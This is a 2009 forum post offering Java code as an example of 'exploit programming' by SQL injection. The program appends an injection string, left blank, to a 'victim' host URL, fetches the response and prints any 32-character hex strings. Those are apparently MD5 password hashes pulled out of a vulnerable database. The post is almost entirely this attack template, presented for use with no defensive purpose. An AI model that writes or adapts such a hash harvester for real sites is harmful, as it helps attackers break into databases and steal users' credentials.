Gonzalez Posted September 29, 2009 Report Posted September 29, 2009 Author: GT3Xheres an simple example how u can use java for exploit programming/*SQL Injection Examplehttp://www.bifrostworld.org*/import java.net.*;import java.io.*;import java.util.regex.*;import java.util.*;import java.io.InputStream;class SQL { public static void main(String[] args){ //Host URl without http:// String host=""; //Injection goes here String inject = ""; String victim = "http://" + host + inject; try{ URL url = new URL(victim); URLConnection connect = url.openConnection(); InputStream in = connect.getInputStream(); Scanner s = new Scanner(in); while(s.hasNext()){ Pattern pat = Pattern.compile("([a-f0-9]{32})"); Matcher match = pat.matcher(s.next()); if(match.find()){ System.out.println(match.group()); }else{ System.out.println("No hash found"); } } }catch(Exception e){ System.out.println(e); } }} Quote